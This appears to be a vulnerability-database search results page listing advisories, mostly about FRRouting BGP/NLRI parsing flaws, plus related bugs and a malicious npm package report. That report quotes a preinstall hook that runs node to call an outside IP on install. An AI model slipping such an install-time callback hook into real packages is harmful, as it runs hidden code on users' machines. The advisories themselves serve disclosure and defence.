Lucene search

17 matches found

OSSF Malicious Packages
added 2026/06/12 9:31 p.m., 11 views

Malicious code in ect-839201 (npm)

Source: amazon-inspector 0ac6cc7433a67e0087dfa415071c9338be630c2166cd38ac371afadbdd0161e3 package.json declares a preinstall lifecycle hook that runs node -e "require'http'.get'http://10.107.121.85:8001/callback839201'" on npm install. Thi...

AI score: 5.4
Exploits: 0, References: 12
Tenable Nessus
added 2026/06/04 12:0 a.m., 8 views

Ubuntu 22.04 LTS / 24.04 LTS / 25.10 / 26.04 LTS : FRR vulnerabilities (USN-8376-1)

The remote Ubuntu 22.04 LTS / 24.04 LTS / 25.10 / 26.04 LTS host has packages installed that are affected by multiple vulnerabilities as referenced in the USN-8376-1 advisory. It was discovered that FRR incorrectly handled certain OSPF Traffic Engineering and Segment Routing TLVs. An attacker cou...

CVSS: 7.5, AI score: 5.7, EPSS: 0.00263
Exploits: 0, References: 5
OSV
added 2026/06/03 9:45 a.m., 3 views

SUSE-SU-2026:22026-1 Security update for frr

This update for frr fixes the following issues: - CVE-2026-5107: Fixed an improper access controls in EVPN Type-2 Route Handler bsc1261013. - CVE-2026-28532: Harden TE/SR TLV iteration against malformed lengths bsc1263859. - CVE-2026-37457: Fix off-by-one error in FlowSpec operator array bounds...

CVSS: 7.5, AI score: 5.4, EPSS: 0.00279
Exploits: 0, References: 9
Positive Technologies
added 2026/05/26 12:0 a.m., 8 views

PT-2026-43275

Name of the Vulnerable Software and Affected Versions: FastNetMon Community Edition versions prior to 1.2.10. Description: Multiple out-of-bounds reads exist in the BGP MP REACH NLRI IPv6 attribute decoder. The decode mp reach ipv6 function in src/bgp protocol.cpp casts raw pointers to structure typ...

CVSS: 7.5, AI score: 5.9, EPSS: 0.00283
Exploits: 0, References: 6
Snyk
added 2026/05/08 10:58 p.m., 5 views

Missing Authorization

Overview: Affected versions of this package are vulnerable to Missing Authorization in the 3gpp-traffic-influence API route group, which lacks inbound authorization checks. An attacker can create, read, modify, or delete traffic-influence subscriptions by sending unauthenticated or forged requests...

CVSS: 9.4, AI score: 5.8, EPSS: 0.00311
Exploits: 1, References: 2
OSV
added 2026/05/04 4:16 p.m., 3 views

UBUNTU-CVE-2026-37458

Missing input validation in the MP_REACH_NLRI component of FRRouting FRR stable/10.0 to stable/10.6 allows authenticated attackers to cause a Denial of Service (DoS) via supplying a crafted UPDATE message...

CVSS: 6.5, AI score: 5.8, EPSS: 0.00249
Exploits: 0, References: 3
Packet Storm News
added 2026/04/23 12:0 a.m., 5 views

FreeScout 1.8.206 Network Reachability and HTTP Security Audit Scanner

The provided PHP script is a network reconnaissance and auditing tool designed to scan a local IP range and identify reachable hosts potentially running web services such as FreeScout...

AI score: 5.8
Exploits: 0
OSV
added 2025/11/06 9:19 a.m., 4 views

CLSA-2025-1762420748 frr: Fix of 4 CVEs

CVE-2023-41358: fix crash when processing NLRIs with zero attribute length - CVE-2023-47235: fix EOR handling to avoid unwanted processing of malformed attributes - CVE-2023-46753: fix mandatory attributes check for UPDATE messages with unknown transit attributes - CVE-2023-47234: fix handling...

CVSS: 7.5, AI score: 7.3, EPSS: 0.01058
Exploits: 0, References: 1
RedHat Linux
added 2024/05/22 10:6 a.m., 5 views

frr: processes invalid NLRIs if attribute length is zero

A flaw was found in FRRouting, where it is susceptible to a denial of service vulnerability triggered by a NULL pointer dereference issue during the processing of Network Layer Reachability Information (NLRIs) with a zero attribute length. The vulnerability arises from inadequate validation of...

CVSS: 7.5, AI score: 5.7, EPSS: 0.01058
Exploits: 0, References: 5
RedHat Linux
added 2024/04/30 10:28 a.m., 3 views

frr: processes invalid NLRIs if attribute length is zero

A flaw was found in FRRouting, where it is susceptible to a denial of service vulnerability triggered by a NULL pointer dereference issue during the processing of Network Layer Reachability Information (NLRIs) with a zero attribute length. The vulnerability arises from inadequate validation of...

CVSS: 7.5, AI score: 5.7, EPSS: 0.01058
Exploits: 0, References: 5
Microsoft CVE
added 2023/11/07 8:0 a.m., 4 views

An issue was discovered in FRRouting FRR through 9.0.1. A crash can occur when processing a crafted BGP UPDATE message with a MP_UNREACH_NLRI attribute and additional NLRI data (that lacks mandatory path attributes).

...

CVSS: 7.5, AI score: 7.7, EPSS: 0.00911
Exploits: 0
OSV
added 2023/11/06 6:15 a.m., 2 views

UBUNTU-CVE-2023-38406

bgpd/bgp_flowspec.c in FRRouting FRR before 8.4.3 mishandles an nlri length of zero, aka a "flowspec overflow."...

CVSS: 9.8, AI score: 7.2, EPSS: 0.00939
Exploits: 0, References: 5
OSV
added 2023/11/03 9:15 p.m., 6 views

AZL-34690 CVE-2023-47234 affecting package frr for versions less than 9.1-2

An issue was discovered in FRRouting FRR through 9.0.1. A crash can occur when processing a crafted BGP UPDATE message with a MP_UNREACH_NLRI attribute and additional NLRI data (that lacks mandatory path attributes)...

CVSS: 7.5, AI score: 7.2, EPSS: 0.00911
Exploits: 0, References: 1
OSV
added 2023/10/20 4:1 p.m., 2 views

CLSA-2023-1697817694 quagga: Fix of 2 CVEs

CVE-2023-41360: don't read the first byte of ORF header if we are ahead of stream - CVE-2023-41358: do not process NLRIs if the attribute length is zero...

CVSS: 9.1, AI score: 6.7, EPSS: 0.01058
Exploits: 0, References: 1
OSV
added 2023/08/29 4:15 a.m., 1 views

DEBIAN-CVE-2023-41358

An issue was discovered in FRRouting FRR through 9.0. bgpd/bgp_packet.c processes NLRIs if the attribute length is zero...

CVSS: 7.5, AI score: 7.6, EPSS: 0.01058
Exploits: 0, References: 1
Vulnrichment
added 2019/10/03 3:49 p.m., 2 views

CVE-2018-16230

The BGP parser in tcpdump before 4.9.3 has a buffer over-read in print-bgp.c:bgp_attr_print() (MP_REACH_NLRI)...

AI score: 7.1, EPSS: 0.03891
Exploits: 0, References: 16
Citrix
added 2017/08/02 12:0 a.m., 9 views

NetScaler SD-WAN Troubleshooting Guide

Citrix SD-WAN, formerly NetScaler SD-WAN. This article helps you diagnose, troubleshoot, and resolve common issues encountered on NetScaler SD-WAN. Note: This is a master overview article. The detailed information for each topic is covered in its individual articles. CTX236987 - Information to Ke...

AI score: 6.9
Exploits: 0